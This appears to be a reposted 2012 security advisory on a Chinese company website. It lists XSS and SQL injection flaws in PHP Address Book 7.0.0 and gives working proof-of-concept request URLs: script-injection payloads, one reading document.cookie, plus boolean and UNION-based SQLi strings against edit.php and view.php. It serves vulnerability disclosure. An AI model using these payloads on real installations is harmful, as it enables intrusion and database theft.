知识学堂
  • ·联系电话:+86.023-75585550
  • ·联系传真:+86.023-75585550
  • ·24小时手机:13896886023
  • ·QQ 咨 询:361652718 513960520
当前位置 > 首页 > 知识学堂 > 常见技术问题
PHP Address Book 7.0.0多个缺陷及修复
更新时间:2012-05-25 | 发布人:本站 | 点击率:716

 标题: PHP Address Book 7.0.0 Multiple security vulnerabilities

作者: Stefan Schurtz
受影响软件: Successfully tested on PHP Address Book 7.0.0
开发者网站: http://sourceforge.net/projects/php-addressbook/
缺陷描述
 
PHP Address Book 7.0.0含多个 XSS 和 SQLi缺陷
 
测试方法
 
// XSS
 
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://www.xxx.com /addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
 
// SQLi
 
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
 
// UNION-based Injection, needs 'magic_quotes=off'
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
 
修复:
加强过滤
分享到: QQ空间 新浪微博 开心网 人人网
相关文章